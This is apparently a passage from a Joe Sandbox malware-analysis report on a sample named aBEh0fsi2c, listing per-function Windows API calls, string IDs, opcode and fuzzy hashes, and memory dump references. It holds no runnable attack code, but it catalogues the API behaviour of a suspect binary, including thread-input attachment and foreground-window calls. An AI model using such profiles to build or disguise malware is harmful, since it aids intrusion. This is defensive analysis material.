                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: ColorLongWindow
                                                          • String ID:
                                                          • API String ID: 259745315-0
                                                          • Opcode ID: ce9ae9ed0905cb4b71766bf660905bbeb69d4b1df5f9c67c68e321c990354f46
                                                          • Instruction ID: 357a0d9da4ea80a5aa9f6c74d67a81a56fb5f13e11353e677db2405f4f8a1b47
                                                          • Opcode Fuzzy Hash: ce9ae9ed0905cb4b71766bf660905bbeb69d4b1df5f9c67c68e321c990354f46
                                                          • Instruction Fuzzy Hash: F5419F311009449FDB235F28EC98BBA3B69EB06321F168765FE658E1E9C7718D42DB21
                                                          APIs
                                                          • CharLowerBuffW.USER32(?,?,003EF910), ref: 003CA90B
                                                          • GetDriveTypeW.KERNEL32(00000061,004189A0,00000061), ref: 003CA9D5
                                                          • _wcscpy.LIBCMT ref: 003CA9FF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: BuffCharDriveLowerType_wcscpy
                                                          • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                          • API String ID: 2820617543-1000479233
                                                          • Opcode ID: e98d87326a9310e07bc2da509a46801002bcd0a56805874843dbe9de2e25e5e3
                                                          • Instruction ID: 53ad8a402c02e5fb258b5fe595a38965cd56abc9d80557abdd29fe9a25e93d35
                                                          • Opcode Fuzzy Hash: e98d87326a9310e07bc2da509a46801002bcd0a56805874843dbe9de2e25e5e3
                                                          • Instruction Fuzzy Hash: 8751A0355183049BC706EF14C892FAFB7A9EF84308F15882DF4959B2A2DB319D09CB53
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: __i64tow__itow__swprintf
                                                          • String ID: %.15g$0x%p$False$True
                                                          • API String ID: 421087845-2263619337
                                                          • Opcode ID: d43b1af3d4153c0ee10d2b3e13bb17a48c9d5b44b9b6934f4afa8ea90e5aa3bf
                                                          • Instruction ID: cc2fa0a2fb218c562da61c9b174cae607d5a8a5fd2511ac1a725399ea1effda5
                                                          • Opcode Fuzzy Hash: d43b1af3d4153c0ee10d2b3e13bb17a48c9d5b44b9b6934f4afa8ea90e5aa3bf
                                                          • Instruction Fuzzy Hash: 0C41C571504309AFDB26EF34D842B7A73ECEF06310F2184AEE549DB295EA3199458B10
                                                          APIs
                                                          • _memset.LIBCMT ref: 003E716A
                                                          • CreateMenu.USER32 ref: 003E7185
                                                          • SetMenu.USER32(?,00000000), ref: 003E7194
                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003E7221
                                                          • IsMenu.USER32(?), ref: 003E7237
                                                          • CreatePopupMenu.USER32 ref: 003E7241
                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 003E726E
                                                          • DrawMenuBar.USER32 ref: 003E7276
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                          • String ID: 0$F
                                                          • API String ID: 176399719-3044882817
                                                          • Opcode ID: 90b945406cc4f1e3dfd43082aba7d58a063386b4f52434290e4ba924abf718b6
                                                          • Instruction ID: f9a96d6a6b848b31b394177bb134a5ab5474654dced76d3a0a81df6f0fe26a6f
                                                          • Opcode Fuzzy Hash: 90b945406cc4f1e3dfd43082aba7d58a063386b4f52434290e4ba924abf718b6
                                                          • Instruction Fuzzy Hash: AA418B74A01255EFDB21DF65E884EDA7BB9FF49300F154628FA059B390D771A910CF90
                                                          APIs
                                                          • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 003E755E
                                                          • CreateCompatibleDC.GDI32(00000000), ref: 003E7565
                                                          • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 003E7578
                                                          • SelectObject.GDI32(00000000,00000000), ref: 003E7580
                                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 003E758B
                                                          • DeleteDC.GDI32(00000000), ref: 003E7594
                                                          • GetWindowLongW.USER32(?,000000EC), ref: 003E759E
                                                          • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 003E75B2
                                                          • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 003E75BE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                          • String ID: static
                                                          • API String ID: 2559357485-2160076837
                                                          • Opcode ID: 470a0b326435326e02718638c1a49f887262f29165e6d055e2973b1a040eacef
                                                          • Instruction ID: dd9727c1ef3430c14b29751d8e86866885766670b765f714f5599b5130b845f3
                                                          • Opcode Fuzzy Hash: 470a0b326435326e02718638c1a49f887262f29165e6d055e2973b1a040eacef
                                                          • Instruction Fuzzy Hash: D2314B311041A4AFDF229F65DC48FEA3B69EF0A360F114325FA159A0E0C771D811DB64
                                                          APIs
                                                          • _memset.LIBCMT ref: 00386E3E
                                                            • Part of subcall function 00388B28: __getptd_noexit.LIBCMT ref: 00388B28
                                                          • __gmtime64_s.LIBCMT ref: 00386ED7
                                                          • __gmtime64_s.LIBCMT ref: 00386F0D
                                                          • __gmtime64_s.LIBCMT ref: 00386F2A
                                                          • __allrem.LIBCMT ref: 00386F80
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00386F9C
                                                          • __allrem.LIBCMT ref: 00386FB3
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00386FD1
                                                          • __allrem.LIBCMT ref: 00386FE8
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00387006
                                                          • __invoke_watson.LIBCMT ref: 00387077
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                          • String ID:
                                                          • API String ID: 384356119-0
                                                          • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                          • Instruction ID: 0e2aa96672b93929e9d3ad3ad2af52e460d1ddd8028a3ae429bc9c0867a51d97
                                                          • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                          • Instruction Fuzzy Hash: E17118B6A00717ABDB16FF78DC42B5AB3A9AF04324F154269F514DB681E770ED408790
                                                          APIs
                                                          • _memset.LIBCMT ref: 003C2542
                                                          • GetMenuItemInfoW.USER32(00425890,000000FF,00000000,00000030), ref: 003C25A3
                                                          • SetMenuItemInfoW.USER32(00425890,00000004,00000000,00000030), ref: 003C25D9
                                                          • Sleep.KERNEL32(000001F4), ref: 003C25EB
                                                          • GetMenuItemCount.USER32(?), ref: 003C262F
                                                          • GetMenuItemID.USER32(?,00000000), ref: 003C264B
                                                          • GetMenuItemID.USER32(?,-00000001), ref: 003C2675
                                                          • GetMenuItemID.USER32(?,?), ref: 003C26BA
                                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 003C2700
                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003C2714
                                                          • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003C2735
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                          • String ID:
                                                          • API String ID: 4176008265-0
                                                          • Opcode ID: 38f60f574c66be1445e966f9c3aa66072c0445151f23b3d72795041f6a8d5440
                                                          • Instruction ID: c92ebf092420adf6e46d6028ca54f78b7e99af665ee9335c4922232fa9e0b23b
                                                          • Opcode Fuzzy Hash: 38f60f574c66be1445e966f9c3aa66072c0445151f23b3d72795041f6a8d5440
                                                          • Instruction Fuzzy Hash: 8D617A74900249EFDB22DF64CC88EAFBBB8EB46304F15056DE842E7291D771AD15DB21
                                                          APIs
                                                          • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 003E6FA5
                                                          • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 003E6FA8
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 003E6FCC
                                                          • _memset.LIBCMT ref: 003E6FDD
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 003E6FEF
                                                          • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 003E7067
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$LongWindow_memset
                                                          • String ID:
                                                          • API String ID: 830647256-0
                                                          • Opcode ID: 6382548fe3a6409434a88b966b73552afa5fc9f800f3794532607a477fe6dabd
                                                          • Instruction ID: c44a6c44a9602b4559878fe6204464e5f0a16679e6fd5e7c12b6920680024a46
                                                          • Opcode Fuzzy Hash: 6382548fe3a6409434a88b966b73552afa5fc9f800f3794532607a477fe6dabd
                                                          • Instruction Fuzzy Hash: 47616C75A00258AFDB12DFA5DC81EEE77B8EB09710F104269FA14EB2E1C771AD41DB50
                                                          APIs
                                                          • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 003B6BBF
                                                          • SafeArrayAllocData.OLEAUT32(?), ref: 003B6C18
                                                          • VariantInit.OLEAUT32(?), ref: 003B6C2A
                                                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 003B6C4A
                                                          • VariantCopy.OLEAUT32(?,?), ref: 003B6C9D
                                                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 003B6CB1
                                                          • VariantClear.OLEAUT32(?), ref: 003B6CC6
                                                          • SafeArrayDestroyData.OLEAUT32(?), ref: 003B6CD3
                                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 003B6CDC
                                                          • VariantClear.OLEAUT32(?), ref: 003B6CEE
                                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 003B6CF9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                          • String ID:
                                                          • API String ID: 2706829360-0
                                                          • Opcode ID: 503642b5a7a68e1f356157adf28282ae0800ca75e0bd473524abdf81ae1c8d75
                                                          • Instruction ID: 455aaadac2c57ab99dec0f220e1807d5859aaa1e8b9348c871cb255e6d3ebedf
                                                          • Opcode Fuzzy Hash: 503642b5a7a68e1f356157adf28282ae0800ca75e0bd473524abdf81ae1c8d75
                                                          • Instruction Fuzzy Hash: 3B4172319001199FCF12DFA5D885DEEBBBDEF08304F008169E955AB2A1CB74A945CF90
                                                          APIs
                                                          • WSAStartup.WSOCK32(00000101,?), ref: 003D5793
                                                          • inet_addr.WSOCK32(?), ref: 003D57D8
                                                          • gethostbyname.WSOCK32(?), ref: 003D57E4
                                                          • IcmpCreateFile.IPHLPAPI ref: 003D57F2
                                                          • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 003D5862
                                                          • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 003D5878
                                                          • IcmpCloseHandle.IPHLPAPI(00000000), ref: 003D58ED
                                                          • WSACleanup.WSOCK32 ref: 003D58F3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                          • String ID: Ping
                                                          • API String ID: 1028309954-2246546115
                                                          • Opcode ID: 2bab4da2775a9478b3136d6f138bdb9e237be1ab2dbbab96902f459448babb5a
                                                          • Instruction ID: f68f8e112e60e7582b3bd21dc39567e5dcf89704a69177f93e63ec3fd6923cb3
                                                          • Opcode Fuzzy Hash: 2bab4da2775a9478b3136d6f138bdb9e237be1ab2dbbab96902f459448babb5a
                                                          • Instruction Fuzzy Hash: 7B5160726047009FDB229F24EC85B6A7BE8EF48710F15852AF956DB3E1DB70E904DB41
                                                          APIs
                                                          • SetErrorMode.KERNEL32(00000001), ref: 003CB4D0
                                                          • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 003CB546
                                                          • GetLastError.KERNEL32 ref: 003CB550
                                                          • SetErrorMode.KERNEL32(00000000,READY), ref: 003CB5BD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Error$Mode$DiskFreeLastSpace
                                                          • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                          • API String ID: 4194297153-14809454
                                                          • Opcode ID: 675e1ae6434c8d5a36f288ae7529787041e2d5b78085b750a87a656984a1ad7f
                                                          • Instruction ID: 4fd1f8ede322d6ec35c4ea8b2e5d407735ca3b636d81c6563b8658d8f6b4b617
                                                          • Opcode Fuzzy Hash: 675e1ae6434c8d5a36f288ae7529787041e2d5b78085b750a87a656984a1ad7f
                                                          • Instruction Fuzzy Hash: 5831A235A40209DFCB12EB68C886FADB7B8EF46310F10812EF505DB291DB719E46CB40
                                                          APIs
                                                            • Part of subcall function 00367DE1: _memmove.LIBCMT ref: 00367E22
                                                            • Part of subcall function 003BAA99: GetClassNameW.USER32(?,?,000000FF), ref: 003BAABC
                                                          • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 003B9014
                                                          • GetDlgCtrlID.USER32 ref: 003B901F
                                                          • GetParent.USER32 ref: 003B903B
                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 003B903E
                                                          • GetDlgCtrlID.USER32(?), ref: 003B9047
                                                          • GetParent.USER32(?), ref: 003B9063
                                                          • SendMessageW.USER32(00000000,?,?,00000111), ref: 003B9066
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                          • String ID: ComboBox$ListBox
                                                          • API String ID: 1536045017-1403004172
                                                          • Opcode ID: a76f3e8eff095352e97386b9004477baead8af1d5a716d5464594ea696b2e872
                                                          • Instruction ID: 66097b0db8f9d8894c910e9bed2750b433406b42a2e6d11080a7b60838521c67
                                                          • Opcode Fuzzy Hash: a76f3e8eff095352e97386b9004477baead8af1d5a716d5464594ea696b2e872
                                                          • Instruction Fuzzy Hash: 0721F870A00148BFDF16ABA0CC85EFEBB78EF45310F10421AFA619B2E1DB795815DB20
                                                          APIs
                                                            • Part of subcall function 00367DE1: _memmove.LIBCMT ref: 00367E22
                                                            • Part of subcall function 003BAA99: GetClassNameW.USER32(?,?,000000FF), ref: 003BAABC
                                                          • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 003B90FD
                                                          • GetDlgCtrlID.USER32 ref: 003B9108
                                                          • GetParent.USER32 ref: 003B9124
                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 003B9127
                                                          • GetDlgCtrlID.USER32(?), ref: 003B9130
                                                          • GetParent.USER32(?), ref: 003B914C
                                                          • SendMessageW.USER32(00000000,?,?,00000111), ref: 003B914F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                          • String ID: ComboBox$ListBox
                                                          • API String ID: 1536045017-1403004172
                                                          • Opcode ID: 4eb9b38e256c53a715850f7dd550540b25e4dc252bc73eee275fa942ae6e34a0
                                                          • Instruction ID: c0ef677df9af5fdfb6554325ae050663006b3d435c3d241aa61bc28442032cbb
                                                          • Opcode Fuzzy Hash: 4eb9b38e256c53a715850f7dd550540b25e4dc252bc73eee275fa942ae6e34a0
                                                          • Instruction Fuzzy Hash: AF21C575A00148BFDF12ABA4CC85FFEBBB8EF44300F104116BA519B2A6DB759955DB20
                                                          APIs
                                                          • GetParent.USER32 ref: 003B916F
                                                          • GetClassNameW.USER32(00000000,?,00000100), ref: 003B9184
                                                          • _wcscmp.LIBCMT ref: 003B9196
                                                          • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 003B9211
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: ClassMessageNameParentSend_wcscmp
                                                          • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                          • API String ID: 1704125052-3381328864
                                                          • Opcode ID: 2c59795b87d88ce78261c8c3677ad36871d86e5f626ace531bbf87e8bb62734f
                                                          • Instruction ID: 0cf7add47df7fa43250434b98afe61c40f08e17ccd4e354f05c41443cec0abc4
                                                          • Opcode Fuzzy Hash: 2c59795b87d88ce78261c8c3677ad36871d86e5f626ace531bbf87e8bb62734f
                                                          • Instruction Fuzzy Hash: CE110D7A6883077AFA133624DC06FE7379C9B15764B300457FB00AC8D1EE6169515658
                                                          APIs
                                                          • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 003C7A6C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: ArraySafeVartype
                                                          • String ID:
                                                          • API String ID: 1725837607-0
                                                          • Opcode ID: 6c70448d4b1c7c699e295d0ebbda0af7772ae99cbe2a9331393618aed0b814bf
                                                          • Instruction ID: 8a919983f27f6f705bfc2aef712300a89c12f3ac29e293452b5515f8e0e72796
                                                          • Opcode Fuzzy Hash: 6c70448d4b1c7c699e295d0ebbda0af7772ae99cbe2a9331393618aed0b814bf
                                                          • Instruction Fuzzy Hash: 26B17B7190420A9FDB12DFA5C885FBEB7B8EF09321F218469E901EB291D774AD41CF90
                                                          APIs
                                                          • GetCurrentThreadId.KERNEL32 ref: 003C11F0
                                                          • GetForegroundWindow.USER32(00000000,?,?,?,?,?,003C0268,?,00000001), ref: 003C1204
                                                          • GetWindowThreadProcessId.USER32(00000000), ref: 003C120B
                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,003C0268,?,00000001), ref: 003C121A
                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 003C122C
                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,003C0268,?,00000001), ref: 003C1245
                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,003C0268,?,00000001), ref: 003C1257
                                                          • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,003C0268,?,00000001), ref: 003C129C
                                                          • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,003C0268,?,00000001), ref: 003C12B1
                                                          • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,003C0268,?,00000001), ref: 003C12BC
                                                          Memory Dump Source
